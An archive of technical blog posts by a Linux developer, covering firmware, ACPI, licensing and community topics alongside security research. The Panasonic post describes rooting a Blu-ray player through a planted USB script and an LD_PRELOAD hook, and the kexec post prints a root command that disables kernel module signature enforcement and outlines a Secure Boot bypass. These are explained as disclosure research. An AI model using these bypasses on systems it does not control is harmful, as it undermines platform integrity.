2014-04-20 19:39
Entry tags:

Home entertainment implementations are pretty appalling

I picked up a Panasonic BDT-230 a couple of months ago. Then I discovered that even though it appeared fairly straightforward to make it DVD region free (I have a large pile of PAL region 2 DVDs), the US models refuse to play back PAL content. We live in an era of software-defined functionality. While Panasonic could have designed a separate hardware SKU with a hard block on PAL output, that would seem like unnecessary expense. So, playing with the firmware seemed like a reasonable start.

Panasonic provide a nice download site for firmware updates, so I grabbed the most recent and set to work. Binwalk found a squashfs filesystem, which was a good sign. Less good was the block at the end of the firmware with "RSA" written around it in large letters. The simple approach of hacking the firmware, building a new image and flashing it to the device didn't appear likely to work.

Which left dealing with the installed software. The BDT-230 is based on a Mediatek chipset, and like most (all?) Mediatek systems runs a large binary called "bdpprog" that spawns about eleventy billion threads and does pretty much everything. Runnings strings over that showed, well, rather a lot, but most promisingly included a reference to "/mnt/sda1/vudu/vudu.sh". Other references to /mnt/sda1 made it pretty clear that it was the mount point for USB mass storage. There were a couple of other constraints that had to be satisfied, but soon attempting to run Vudu was actually setting a blank root password and launching telnetd.

/acfg/config_file_global.txt was the next stop. This is a set of tokens and values with useful looking names like "IDX_GB_PTT_COUNTRYCODE". I tried changing the values, but unfortunately made a poor guess - on next reboot, the player had reset itself to DVD region 5, Blu Ray region C and was talking to me in Russian. More inconveniently, the Vudu icon had vanished and I couldn't launch a shell any more.

But where there's one obvious mechanism for running arbitrary code, there's probably another. /usr/local/bin/browser.sh contained the wonderful line:
export LD_PRELOAD=/mnt/sda1/bbb/libSegFault.so
, so then it was just a matter of building a library that hooked open() and launched inetd and dropping that into the right place, and then opening the browser.

This time I set the country code correctly, rebooted and now I can actually watch Monkey Dust again. Hurrah! But, at the same time, concerning. This software has been written without any concern for security, and it listens on the network by default. If it took me this little time to find two entirely independent ways to run arbitrary code on the device, it doesn't seem like a stretch to believe that there are probably other vulnerabilities that can be exploited with less need for physical access.

The depressing part of this is that there's no reason to believe that Panasonic are especially bad here - especially since a large number of vendors are shipping much the same Mediatek code, and so probably have similar (if not identical) issues. The future is made up of network-connected appliances that are using your electricity to mine somebody else's Dogecoin. Our nightmarish dystopia may be stranger than expected.
2014-04-13 21:43
Entry tags:

Real-world Secure Boot attacks

MITRE gave a presentation on UEFI Secure Boot at SyScan earlier this month. You should read the the presentation and paper, because it's really very good.

It describes a couple of attacks. The first is that some platforms store their Secure Boot policy in a run time UEFI variable. UEFI variables are split into two broad categories - boot time and run time. Boot time variables can only be accessed while in boot services - the moment the bootloader or kernel calls ExitBootServices(), they're inaccessible. Some vendors chose to leave the variable containing firmware settings available during run time, presumably because it makes it easier to implement tools for modifying firmware settings at the OS level. Unfortunately, some vendors left bits of Secure Boot policy in this space. The naive approach would be to simply disable Secure Boot entirely, but that means that the OS would be able to detect that the system wasn't in a secure state[1]. A more subtle approach is to modify the policy, such that the firmware chooses not to verify the signatures on files stored on fixed media. Drop in a new bootloader and victory is ensured.

But that's not a beautiful approach. It depends on the firmware vendor having made that mistake. What if you could just rewrite arbitrary variables, even if they're only supposed to be accessible in boot services? Variables are all stored in flash, connected to the chipset's SPI controller. Allowing arbitrary access to that from the OS would make it straightforward to modify the variables, even if they're boot time-only. So, thankfully, the SPI controller has some control mechanisms. The first is that any attempt to enable the write-access bit will cause a System Management Interrupt, at which point the CPU should trap into System Management Mode and (if the write attempt isn't authorised) flip it back. The second is to disable access from the OS entirely - all writes have to take place in System Management Mode.

The MITRE results show that around 0.03% of modern machines enable the second option. That's unfortunate, but the first option should still be sufficient[2]. Except the first option requires on the SMI actually firing. And, conveniently, Intel's chipsets have a bit that allows you to disable all SMI sources[3], and then have another bit to disable further writes to the first bit. Except 40% of the machines MITRE tested didn't bother setting that lock bit. So you can just disable SMI generation, remove the write-protect bit on the SPI controller and then write to arbitrary variables, including the SecureBoot enable one.

This is, uh, obviously a problem. The good news is that this has been communicated to firmware and system vendors and it should be fixed in the future. The bad news is that a significant proportion of existing systems can probably have their Secure Boot implementation circumvented. This is pretty unsurprisingly - I suggested that the first few generations would be broken back in 2012. Security tends to be an iterative process, and changing a branch of the industry that's historically not had to care into one that forms the root of platform trust is a difficult process. As the MITRE paper says, UEFI Secure Boot will be a genuine improvement in security. It's just going to take us a little while to get to the point where the more obvious flaws have been worked out.

[1] Unless the malware was intelligent enough to hook GetVariable, detect a request for SecureBoot and then give a fake answer, but who would do that?
[2] Impressively, basically everyone enables that.
[3] Great for dealing with bugs caused by YOUR ENTIRE COMPUTER BEING INTERRUPTED BY ARBITRARY VENDOR CODE, except unfortunately it also probably disables chunks of thermal management and stops various other things from working as well.
2014-04-03 15:18
Entry tags:

Mozilla and leadership

A post I wrote back in 2012 got linked from a couple of the discussions relating to Brendan Eich being appointed Mozilla CEO. The tldr version is "If members of your community doesn't trust their leader socially, the leader's technical competence is irrelevant". That seems to have played out here.

In terms of background[1]: in 2008, Brendan donated money to the campaign for Proposition 8, a Californian constitutional amendment that expressly defined marriage as being between one man and one woman[2]. Both before and after that he had donated money to a variety of politicians who shared many political positions, including the definition of marriage as being between one man and one woman[3].

Mozilla is an interesting organisation. It consists of the for-profit Mozilla Corporation, which is wholly owned by the non-profit Mozilla Foundation. The Corporation's bylaws require it to work to further the Foundation's goals, and any profit is reinvested in Mozilla. Mozilla developers are employed by the Corporation rather than the Foundation, and as such the CEO is responsible for ensuring that those developers are able to achieve those goals.

The Mozilla Manifesto discusses individual liberty in the context of use of the internet, not in a wider social context. Brendan's appointment was very much in line with the explicit aims of both the Foundation and the Corporation - whatever his views on marriage equality, nobody has seriously argued about his commitment to improving internet freedom. So, from that perspective, he should have been a fine choice.

But that ignores the effect on the wider community. People don't attach themselves to communities merely because of explicitly stated goals - they do so because they feel that the community is aligned with their overall aims. The Mozilla community is one of the most diverse in free software, at least in part because Mozilla's stated goals and behaviour are fairly inspirational. People who identify themselves with other movements backing individual liberties are likely to identify with Mozilla. So, unsurprisingly, there's a large number of socially progressive individuals (LGBT or otherwise) in the Mozilla community, both inside and outside the Corporation.

A CEO who's donated money to strip rights[4] from a set of humans will not be trusted by many who believe that all humans should have those rights. It's not just limited to individuals directly affected by his actions - if someone's shown that they're willing to strip rights from another minority for political or religious reasons, what's to stop them attempting to do the same to you? Even if you personally feel safe, do you trust someone who's willing to do that to your friends? In a community that's made up of many who are either LGBT or identify themselves as allies, that loss of trust is inevitably going to cause community discomfort.

The first role of a leader should be to manage that. Instead, in the first few days of Brendan's leadership, we heard nothing of substance - at best, an apology for pain being caused rather than an apology for the act that caused the pain. And then there was an interview which demonstrated remarkable tone deafness. He made no attempt to alleviate the concerns of the community. There were repeated non-sequiturs about Indonesia. It sounded like he had no idea at all why the community that he was now leading was unhappy.

And, today, he resigned. It's easy to get into hypotheticals - could he have compromised his principles for the sake of Mozilla? Would an initial discussion of the distinction between the goals of members of the Mozilla community and the goals of Mozilla itself have made this more palatable? If the board had known this would happen, would they have made the same choice - and if they didn't know, why not?

But that's not the real point. The point is that the community didn't trust Brendan, and Brendan chose to leave rather than do further harm to the community. Trustworthy leadership is important. Communities should reflect on whether their leadership reflects not only their beliefs, but the beliefs of those that they would like to join the community. Fail to do so and you'll drive them away instead.

[1] For people who've been living under a rock
[2] Proposition 8 itself was a response to an ongoing court case that, at the point of Proposition 8 being proposed, appeared likely to support the overturning of Proposition 22, an earlier Californian ballot measure that legally (rather than constitutionally) defined marriage as being between one man and one woman. Proposition 22 was overturned, and for a few months before Proposition 8 passed, gay marriage was legal in California.
[3] http://www.theguardian.com/technology/2014/apr/02/controversial-mozilla-ceo-made-donations-right-wing-candidates-brendan-eich
[4] Brendan made a donation on October 25th, 2008. This postdates the overturning of Proposition 22, and as such gay marriage was legal in California at the time of this donation. Donating to Proposition 8 at that point was not about supporting the status quo, it was about changing the constitution to forbid something that courts had found was protected by the state constitution.
2014-03-23 23:39
Entry tags:

What free software means to me

I was awarded the Free Software Foundation Award for the Advancement of Free Software this weekend[1]. I'd been given some forewarning, and I spent a bunch of that time thinking about how free software had influenced my life. It turns out that it's a lot.

I spent most of the 90s growing up in an environment that was rather more interested in cattle than in computers, and had very little internet access during that time. My entire knowledge of the wider free software community came from a couple of CDs that contained a copy of the jargon file, the source code to the entire GNU project and an early copy of the m68k Linux kernel.

But that was enough. Before I'd even got to university, I knew what free software was. I'd had the opportunity to teach myself how an operating system actually worked. I'd seen the benefits of being able to modify software and share those modifications with others. I met other people with the same interests. I ended up with a job writing free software and collaborating with others on integrating it with upstream code. And, from there, I became more and more involved with a wider range of free software communities, finding an increasing number of opportunities to help make changes that benefited both me and others.

Without free software I'd have started years later. I'd have lost the opportunity to collaborate with people spread over the entire world. My first job would have looked very different, as would my entire career since then. Without free software, almost everything I've achieved in my adult life would have been impossible.

To me, free software means I've lived a significantly better life than would otherwise have been the case. But more than that, it means doing what I can to make sure that other people have the same opportunities. I am here because of the work of others. The most rewarding part of my continued involvement is the knowledge that I am part of a countless number of people working to make sure that others can tell the same story in future.

[1] I'd link to the actual press release, but it contains possibly the worst photograph of me in the entire history of the universe
2014-03-12 15:37
Entry tags:

Dealing with Apple ACPI issues

I wrote about Thunderbolt on Apple hardware a while ago. Since then Andreas Noever has somehow managed to write a working Thunderbolt stack, which awesome! But there was still the problem I mentioned of the device not appearing unless you passed acpi_osi="Darwin" on the kernel command line, and a further problem that if you suspended and then resumed it vanished again.

The ACPI _OSI interface is a mechanism for the firmware to determine the OS that the system is running. It turns out that this works fine for operating systems that export fairly static interfaces (Windows, which adds a new _OSI per release) and poorly for operating systems that don't even guarantee any kind of interface stability in security releases (Linux, which claimed to be "Linux" regardless of version until we turned that off). OS X claims to be Darwin and nothing else. As I mentioned before, claiming to be Darwin in addition to Windows was enough to get the Thunderbolt hardware to stay alive after boot, but it wasn't enough to get it powered up again after suspend.

It turns out that there's two sections of ACPI code where this Mac checks _OSI. The first is something like:

if (_OSI("Darwin")) Store 0x2710 OSYS; else if(_OSI("Windows 2009") Store 0x7D9 OSYS; else…

ie, if the OS claims to be Darwin, all other strings are ignored. This is called from \_SB._INI(), which is the first ACPI method the kernel executes. The check for whether to power down the Thunderbolt controller occurs after this and then works correctly.

The second version is less helpful. It's more like:

if (_OSI("Darwin")) Store 0x2710 OSYS; if (_OSI("Windows 2009")) Store 0x7D9 OSYS; if…

ie, if the OS claims to be both Darwin and Windows 2009 (which Linux will if you pass acpi_osi="Darwin"), the OSYS variable gets set to the Windows 2009 value. This version gets called during PCI initialisation, and once it's run all the other Thunderbolt ACPI calls stop doing anything and the controller gets powered down after suspend/resume. That can be fixed easily enough by special casing Darwin. If the platform requests Darwin before anything else, we'll just stop claiming to be Windows.

Phew. Working Thunderbolt! (Well, almost - _OSC fails and so we disable PCIe hotplug, but that's easy to work around). But boo, no working battery. Apple do something very strange with their ACPI battery interface. If you're running anything that doesn't claim to be Darwin, Apple expose an ACPI Control Method battery. Control Method interfaces abstract the complexity away into either ACPI bytecode or system management traps - the OS simply calls an ACPI method, magic happens and it gets an answer back. If you claim to be Darwin, Apple remove that interface and instead expose the raw ACPI Smart Battery System interface. This provides an i2c bus over which the OS must then speak the Smart Battery System protocol, allowing it to directly communicate with the battery.

Linux has support for this, but it seems that this wasn't working so well and hadn't been for years. Loading the driver resulted in modprobe hanging until a timeout occurred, and most accesses to the battery would (a) take forever and (b) probably fail. It also had the nasty habit of breaking suspend and resume, which was unfortunate since getting Thunderbolt working over suspend and resume was the whole point of this exercise.

So. I modified the sbs driver to dump every command it sent over the i2c bus and every response it got. Pretty quickly I found that the failing operation was a write - specifically, a write used to select which battery should be connected to the bus. Interestingly, Apple implemented their Control Method interface by just using ACPI bytecode to speak the SBS protocol. Looking at the code in question showed that they never issued any writes, and the battery worked fine anyway. So why were we writing? SBS provides a command to tell you the current state of the battery subsystem, including which battery (out of a maximum of 4) is currently selected. Unsurprisingly, calling this showed that the battery we wanted to talk to was already selected. We then asked the SBS manager to select it anyway, and the manager promptly fell off the bus and stopped talking to us. In keeping with the maxim of "If hardware complains when we do something, and if we don't really need to do that, don't do that", this makes it work.

Working Thunderbolt and working battery. We're even getting close to getting switchable GPU support working reasonably, which is probably just going to involve rewriting the entirety of fbcon or something similarly amusing.
2014-03-09 23:48
Entry tags:

The simple things in life

I've spent a while trying to make GPU switching work more reliably on Apple hardware, and got to the point where my Retina MBP now comes up with X running on Intel regardless of what the firmware wanted to do (test patches here. But in the process I'd introduced an additional GPU switch which added another layer of flicker to the boot process. I spent some time staring at driver code and poking registers trying to figure out how I could let i915 probe EDID from the panel without switching the display over and made no progress at all.

And then I realised that nouveau already has all the information that i915 wants, and maybe we could just have the Switcheroo code hand that over instead of forcing i915 to probe again. Sigh.
2014-02-23 10:32
Entry tags:

The importance of a community-focused mindset

Piston, an Openstack-in-a-box vendor[1] are a sponsor of the Red Hat[2] Summit this year. Last week they briefly ceased to be for no publicly stated reason, although it's been sugggested that this was in response to Piston winning a contract that Red Hat was also bidding on. This situation didn't last for long - Red Hat's CTO tweeted that this was an error and that Red Hat would pay Piston's sponsorship fee for them.

To Red Hat's credit, having the CTO immediately and publicly accept responsibility and offer reparations seems like the best thing they could possibly do in the situation and demonstrates that there are members of senior management who clearly understand the importance of community collaboration to Red Hat's success. But that leaves open the question of how this happened in the first place.

Red Hat is big on collaboration. Workers get copies of the Red Hat Brand Book, an amazingly well-written description of how Red Hat depends on the wider community. New hire induction sessions stress the importance of open source and collaboration. Red Hat staff are at the heart of many vital free software projects. As far as fundamentally Getting It is concerned, Red Hat are a standard to aspire to.

Which is why something like this is somewhat unexpected. Someone in Red Hat made a deliberate choice to exclude Piston from the Summit. If the suggestion that this was because of commercial concerns is true, it's antithetical to the Red Hat Way. Piston are a contributor to upstream Openstack, just as Red Hat are. If Piston can do a better job of selling that code than Red Hat can, the lesson that Red Hat should take away is that they need to do a better job - not punish someone else for doing so.

However, it's not entirely without precedent. The most obvious example is the change to kernel packaging that happened during the RHEL 6 development cycle. Previous releases had included each individual modification that Red Hat made to the kernel as a separate patch. From RHEL 6 onward, all these patches are merged into one giant patch. This was intended to make it harder for vendors like Oracle to compete with RHEL by taking patches from upcoming RHEL point releases, backporting them to older ones and then selling that to Red Hat customers. It obviously also had the effect of hurting other distributions such as Debian who were shipping 2.6.32-based kernels - bugs that were fixed in RHEL had to be separately fixed in Debian, despite Red Hat continuing to benefit from the work Debian put into the stable 2.6.32 point releases.

It's almost three years since that argument erupted, and by and large the community seems to have accepted that the harm Oracle were doing to Red Hat (while giving almost nothing back in return) justified the change. The parallel argument in the Piston case might be that there's no reason for Red Hat to give advertising space to a company that's doing a better job of selling Red Hat's code than Red Hat are. But the two cases aren't really equal - Oracle are a massively larger vendor who take significantly more from the Linux community than they contribute back. Piston aren't.

Which brings us back to how this could have happened in the first place. The Red Hat company culture is supposed to prevent people from thinking that this kind of thing is acceptable, but in this case someone obviously did. Years of Red Hat already having strong standing in a range of open source communities may have engendered some degree of complacency and allowed some within the company to lose track of how important Red Hat's community interactions are in perpetuating that standing. This specific case may have been resolved without any further fallout, but it should really trigger an examination of whether the reality of the company culture still matches the theory. The alternative is that this kind of event becomes the norm rather than the exception, and it takes far less time to lose community goodwill than it takes to build it in the first place.

[1] And, in the spirit of full disclosure, a competitor to my current employer
[2] Furthering the spirit of full disclosure, a former employer
2014-02-10 11:14
Entry tags:

IBM's remote firmware configuration protocol

I spent last week looking into the firmware configuration protocol used on current IBM system X servers. IBM provide a tool called ASU for configuring firmware settings, either in-band (ie, running on the machine you want to reconfigure) or out of band (ie, running on a remote computer and communicating with the baseboard management controller - IMM in IBM-speak). I'm not a fan of using vendor binaries for this kind of thing. They tend to be large (ASU is a 20MB executable) and difficult to script, so I'm gradually reimplementing them in Python. Doing that was fairly straightforward for Dell and Cisco, both of whom document their configuration protocol. IBM, on the other hand, don't. My first plan was to just look at the wire protocol, but it turns out that it's using IPMI 2.0 to communicate and that means that the traffic is encrypted. So, obviously, time to spend a while in gdb.

The most important lesson I learned last time I did this was "Check whether the vendor tool has a debug option". ASU didn't mention one in its help text and there was no sign of a getopt string, so this took a little longer - but nm helpfully showed a function called DebugLog and setting a breakpoint on that in gdb showed it being called a bunch of the time, so woo. Stepping through the function revealed that it was checking the value of a variable, and looking for other references to that variable in objdump revealed a -l argument. Setting that to 255 gave me rather a lot of output. Nearby was a reference to --showsptraffic, and passing that as well gave me output like:

BMC Sent: 2e 90 4d 4f 00 06 63 6f 6e 66 69 67 2e 65 66 69
BMC Recv: 00 4d 4f 00 21 9e 00 00

which was extremely promising. 2e is IPMI-speak for an OEM specific command, which seemed pretty plausible. 4d 4f 00 is 20301 in decimal, which is the IANA enterprise number for IBM's system X division (this is required by the IPMI spec, it wasn't an inspired piece of deduction on my behalf). 63 6f 6e 66 69 67 2e 65 66 69 is ASCII for config.xml. That left 90 and 06 to figure out. 90 appeared in all of the traces, so it appears to be the command to indicate that the remaining data is destined for the IMM. The prior debug output indicated that we were in the QuerySize function, so 06 presumably means… query the size. And this is supported by the response - 00 (a status code), 4d 4f 00 (the IANA enterprise number again, to indicate that the responding device is speaking the same protocol as you) and 21 9e 00 00 - or, in rational endianness, 40481, an entirely plausible size.

Once I'd got that far the rest started falling into place fairly quickly. 01 rather than 06 indicated a file open request, returning a four byte file handle of some description. 02 was read, 03 was write and 05 was close. Hacking this together with pyghmi meant I could open a file and read it. Success!

Well, kind of. I was getting back a large blob of binary. The debug trace showed calls to an EfiDecompress function, so on a whim I tried just decompressing it using the standard UEFI compression format. Shockingly, it worked and now I had a 345K XML blob and presumably many more problems than I'd previously had. Parsing the XML was fairly straightforward, and now I could retrieve the full set of config options, along with the default, current and possible values for them.

Making changes was pretty much just the reverse of this. A small XML blob containing the new values is compressed and written to asu_update.efi. One of the elements is a random identifier, which will then appear in another file called config_log along with a status. Just keep re-reading this until the value changes to CM_DONE and we're good.

The in-band configuration appears to be identical, but rather than sending commands over the wire they're send through the system's IPMI controller directly. Yes, this does mean that it's sending compressed XML through a single io port. Yes, I'd rather be drinking.

I've documented the protocol here and hope to be able to release this code before too long - right now I'm trying to nail down the interface a little, but it's broadly working.
2014-01-20 10:45
Entry tags:

Not all CLAs are equal

Contributor License Agreements ("CLAs") are a mechanism for an upstream software developer to insist that contributors grant the upstream developer some additional set of rights. These range in extent - some CLAs require that the contributor reassign their copyright over the contribution to the upstream developer, some merely provide the upstream developer with a grant of rights that aren't explicit in the software license (such as an explicit patent grant for a contribution licensed under a BSD-style license).

CLAs aren't new. FSF-copyrighted projects have been using copyright assignment since at least 1985 - in return, the FSF promise that the software will always be distributed under a copyleft-style license. For over a decade, Apache Software Foundation projects have required that contributors sign a CLA that allows them to retain copyright, but grants the ASF the right to relicense the work as it wishes. For the most part, this hasn't been terribly controversial.

So why do people object so much when Canonical do it? I've written about this in the context of Mir before, but it's worth expanding on the general case. The FSF's copyright assignment ensures that contributions to GPLed software will only be distributed under GPL-style licenses. The Apache CLA permits the ASF to relicense a contribution under a proprietary license, but the Apache license allows anyone to do that anyway. Going through Wikipedia's list of CLA users, the majority cover projects that are under BSD- or Apache-style licenses, with a couple of cases covering GPLed projects with a promise that any contributions will only be distributed under GPL-like licenses[1]. Either everyone can produce proprietary derivative works, or nobody can.

In contrast, Canonical ship software under the GPLv3 family of licenses (GPL, AGPL and LGPL) but require that contributors sign an agreement that permits Canonical to relicense their contributions under a proprietary license. This is a fundamentally different situation to almost all widely accepted CLAs, and it's disingenuous for Canonical to defend their CLA by pointing out the broad community uptake of, for instance, the Apache CLA.

Canonical could easily replace their CLA with one that removed this asymmetry - Project Harmony, the basis of Canonical's CLA, permits you to specify an "inbound equals outbound" agreement that prevents upstream from relicensing under a proprietary license[2]. Canonical's deliberate choice not to do so just strengthens the argument that the CLA is primarily about wanting to produce proprietary versions of software rather than wanting to strengthen their case in any copyright or patent disputes. It's unsurprising that people feel disinclined to contribute to projects under those circumstances, and it's difficult to understand why Canonical simultaneously insist on this hostile behaviour and bemoan the lack of community contribution to Canonical projects.

[1] The one major exception is the Digia/Qt project CLA, which covers an LGPLed work but makes it entirely clear that Digia will ship your contributions under proprietary licenses as well. At least they're honest.

[2] See the various options in section 2.1(d) here. Canonical chose option five. If they'd chosen option one instead, this wouldn't be a problem.
2013-12-03 15:06
Entry tags:

Subverting security with kexec

(Discussion of a presentation I gave at Kiwicon last month)

Kexec is a Linux kernel feature intended to allow the booting of a replacement kernel at runtime. There's a few reasons you might want to do that, such as using Linux as a bootloader[1], rebooting without having to wait for the firmware to reinitialise or booting into a minimal kernel and userspace that can be booted on crash in order to save system state for later analysis.

But kexec's significantly more flexible than this. The kexec system call interface takes a list of segments (ie, pointers to a userspace buffer and the desired target destination) and an entry point. The kernel relocates those segments and jumps to the entry point. That entry point is typically code referred to as purgatory, due to the fact that it lives between the world of the first kernel and the world of the second kernel. The purgatory code sets up the environment for the second kernel and then jumps to it. The first kernel doesn't need to know anything about what the second kernel is or does. While it's conventional to load Linux, you can load just about anything.

The most important thing to note here is that none of this is signed. In other words, despite us having a robust in-kernel mechanism for ensuring that only signed modules can be inserted into the kernel, root can still load arbitrary code via kexec and execute it. This seems like a somewhat irritating way to patch the running kernel, so thankfully there's a much more straightforward approach.

I modified kexec to add an additional loader and uploaded the code here. Build and install it. Make sure that /sys/module/module/parameters/sig_enforce on your system is "Y". Then, as root, do something like:
kexec --type="dummy" --address=`printf "0x%x" $(( $(grep "B sig_enforce" /proc/kallsyms | awk '{print "0x"$1}') & 0x7fffffff))` --value=0 --load-preserve-context --mem-max=0x10000 /bin/true
to load it[2]. Now do kexec -e and watch colours flash and check /sys/module/module/parameters/sig_enforce again.

The beauty of this approach is that it doesn't rely on any kernel bugs - it's using kernel functionality that was explicitly designed to let you do this kind of thing (ie, run arbitrary code in ring 0). There's not really any way to fix it beyond adding a new system call that has rather tighter restrictions on the binaries that can be loaded. If you're using signed modules but still permit kexec, you're not really adding any additional security.

But that's not the most interesting way to use kexec. If you can load arbitrary code into the kernel, you can load anything. Including, say, the Windows kernel. ReactOS provides a bootloader that's able to boot the Windows 2003 kernel, and it shouldn't be too difficult for a sufficiently enterprising individual to work out how to get Windows 8 booting. Things are a little trickier on UEFI - you need to tell the firmware which virtual→physical map to use, and you can only do it once. If Linux has already done that, it's going to be difficult to set up a different map for Windows. Thankfully, there's an easy workaround. Just boot with the "noefi" kernel argument and the kernel will skip UEFI setup, letting you set up your own map.

Why would you want to do this? The most obvious reason is avoiding Secure Boot restrictions. Secure Boot, if enabled, is explicitly designed to stop you booting modified kernels unless you've added your own keys. But if you boot a signed Linux distribution with kexec enabled (like, say, Ubuntu) then you're able to boot a modified Windows kernel that will still believe it was booted securely. That means you can disable stuff like the Early Launch Anti-Malware feature or driver signing, or just stick whatever code you want directly into the kernel. In most cases all you'd need for this would be a bootloader, kernel and an initrd containing support for the main storage, an ntfs driver and a copy of kexec-tools. That should be well under 10MB, so it'll easily fit on the EFI system partition. Copy it over the Windows bootloader and you should be able to boot a modified Windows kernel without any terribly obvious graphical glitches in the process.

And that's the story of why kexec is disabled on Fedora when Secure Boot is enabled.

[1] That way you only have to write most drivers once
[2] The address section finds the address of the sig_enforce symbol in the kernel, and the value argument tells the dummy code what value to set that address to. --load-preserve-context informs the kernel that it should save hardware state in order to permit returning to the original kernel. --mem-max indicates the highest address that the kernel needs to back up. /bin/true is just there to satisfy the argument parser.
2013-10-16 13:48
Entry tags:

Standing for the Linux Foundation Technical Advisory Board

According to its charter, the Linux Foundation Technical Advisory Board exists "to advise The Linux Foundation Board of Directors (Board) and the management of The Linux Foundation (Management) on matters related to supporting the technical agenda of The Linux Foundation". It consists of 10 members, with 5 seats up for election each year. Elections take place at an event at Kernel Summit, but are also open to attendees of whichever conference is colocated with the Kernel Summit that year. The election announcement is emailed to the Linux kernel list and tech-board-discuss, a mostly moribund list that springs into life once a year for election announcements.

This arrangement seemed odd to me even back in 2007. Back then the Linux Foundation was already sponsoring development of certain non-kernel components, and now that list is even larger. While nominally open to all, nominations for the TAB tend to end up being people actively involved in the kernel community. That's probably better than people limited to any other single technical community (kernel developers tend to end up dealing with bugs from a fairly wide range of projects, so they're not entirely unaware of what other people have to deal with), but it still seems suboptimal. The current membership is mostly limited to people who spend little to no time working with userspace developers, let alone anyone active in other Linux Foundation projects. I don't think this is a good thing

So, after several years of considering it, I'm finally standing for the TAB. I've been an active developer at most levels of the Linux stack, from the kernel through to desktop environments. I've worked closely with distributions. I've even worked closely with firmware developers. I'm not intimately involved in any of the other Linux Foundation projects, but I have experience that allows me to better understand their needs and motivations than I'd have from having spent my entire life living in the kernel. Being on the TAB would make it easier to ensure that these projects are represented in a meaningful way.

Of the other people who I know are standing (and this list may well grow longer), I'm inclined to vote for:
  • Greg Kroah Hartman - while we've disagreed on a range of points, Greg's worked closely with userspace developers and even represents the Linux Foundation on the UEFI Forum. He's able to provide a wide range of expertise to the TAB and it benefits from that.
  • Jon Corbet - Jon's work on LWN should need no introduction. He's done an amazing job of keeping track of a range of technical developments across the entire Linux community, so is uniquely well suited to making sure that a range of opinions is represented.
  • Sarah Sharp - Sarah's certainly primarily a kernel developer, but she's been the loudest voice calling for the kernel community to spend some time thinking about whether it's as welcoming as it could be. Increasing the diversity of the kernel community allows us to hear a wider range of technical viewpoints, which benefits both the kernel and everything that depends on it.

The election is currently scheduled to be National Museum in Edinburgh on the evening of the 23rd of October. If you're attending Linuxcon or one of the colocated events, please do come along and vote.

(Updated to correct a typo)
2013-10-15 10:10
Entry tags:

Hacker News is a social echo chamber

Hacker News is a fairly influential link aggregation site, with stories submitted and voted on by users. As explained in the FAQ, the ranking of stories is roughly determined by the number of votes divided by a function of the time since submission. It's not a huge traffic driver (my personal experience of stories on the front page is on the order of 30,000 hits), but it's notable because the demographic tends to include a more technically literate and influential set of readers than most other sites. The discussion that ensues from technical posts often includes meaningful feedback from domain experts. Stories that appear there are likely to be noted by technology workers, especially in the Silicon Valley startup field[1].

That rather specific demographic appears to correlate with other traits. There's a rather more techno-libertarian bias on Hacker News than on most general discussion forums, which is consistent with the startup-oriented culture that it springs from - the desire to provide disruptive solutions to real world problems tends to collide with existing regulatory frameworks, so it's unsurprising that a belief in individual rights and small government would overlap with US startup culture. There's a leaning towards the use of web technologies rather than traditional client applications, which matches what people are doing in the rest of the world. And there's more enthusiasm for liberal open-source licenses over Copyleft licenses, which makes sense in a web-focused environment (as I wrote about here).

Now, personally I'm a big-government, client-app, Copyleft kind of person, but for the most part I don't think the above is actively dangerous. It's inevitable that political views will vary, we'll probably continue to cycle between thick and thin clients for generations and nobody's ever going to demonstrably prove that one licensing model deserves to win over another. But what is important is that the ongoing debates between these opinions be driven by facts, and that it remain obvious that these disagreements exist. As far as technical (and even political) discussion goes, Hacker News doesn't seem to
have a problem with that. Disagreeing with the orthodoxy is tolerated.


This seems less true when it comes to social issues. When a posting discussing the myth of the natural born programmer[2] hit the front page, the top rated comment is Paul Graham[3] off-handedly discounting the conclusions drawn. The original story linked to a review of peer-reviewed scientific research. Graham simply discounts it on the basis of his preconceptions. Shortly afterwards, the story plummeted off the front page, now surrounded by stories posted around the same time but with much lower scores.

How does this happen? There's two publicised methods which can result in stories dropping down the order. Users with high karma scores (either via submitting popular stories or writing popular comments) are able to flag submissions, and if enough do so then a negative weighting is applied to the story. There's also a flamewar detector, a heuristic that attempts to detect contentious subjects and pushes them off the front page.

The effect of both is to enforce the status quo of social beliefs. Stories that appear to challenge the narrative that good programmers are just naturally talented tend to vanish. Stories that discuss the difficulties faced by minorities in our field are summarily disappeared. There are no social problems in the technology industry. We have always been at war with Eastasia.

This isn't healthy. We don't improve the state of the software industry by hiding stories that expose conflicts. Flamewars don't solve problems, but without them we'd be entirely unaware of how much of a victim blaming mentality exists amongst our peers. It's true that conflict may reinforce preconceptions, causing people to dig in as they defend their beliefs. However, the absence of conflict does nothing to counteract that. If you're never exposed to opinions you disagree with, you'll never question your existing beliefs.

Hacker News is a privately run site and nobody's under any obligation to change how they choose to run it. But the focus on avoiding conflict to such an extent that controversial stories receive less exposure than ones that fit people's existing beliefs doesn't enhance our community. If we want to be able to use technology as an instrument of beneficial change to society as a whole, we benefit from building a diverse and welcoming community and questioning our preconceptions. Building a social echo chamber risks marginalising us from the rest of society, gradually becoming ignored and irrelevant as our self-reinforcing opinions drift ever further away from the mainstream. It doesn't help anybody.

[1] During the batch of interviews I did last year, two separate interviewers both mentioned a story they'd read on Hacker News that turned out to have been written by me. I'm not saying that that's what determined a hire/don't hire decision, but it seems likely that it helped.
[2] The article in question discusses the pervasive idea that some people are inherently good programmers. It turns out that perpetuating the idea that some people are just born good at a particular skill actually discourages others from even trying to learn it, even those who are just as capable.
[3] One of the co-founders of Y-Combinator and creator of Hacker News.

(Edited to fix a footnote reference)
2013-10-02 11:42
Entry tags:

The state of XMir

XMir's been delayed from Ubuntu 13.10. The stated reason is that multi-monitor support isn't sufficiently reliable. That's true, but it's far from the only problem that XMir still has:

  • It's still broken on some single-monitor systems

  • Some machines have display corruption. There are writes to freed memory. To be fair, some of the behaviour that's been seen has been down to underlying bugs in the Xorg drivers that were never triggered under normal use but are hit by XMir. Others are down to implicit assumptions made in the drivers that XMir happens to violate. The problem is that there doesn't appear to have been enough room in the schedule to deal with these interactions, presumably because nobody accounted for the inevitable "This thing we thought would be easy turns out to be difficult" part of the project.

  • The input driver bug still isn't really fixed

  • I've mentioned this bug before. It's now marked "Fix released" which is kind of true but not really. Mir now tells XMir that the VT is changing before the VT is changed, but it doesn't wait for that to complete before switching the VTs. Until XMir is scheduled and runs, it's still receiving input events. In most circumstances that window is small, so there's no real risk of triggering it accidentally.

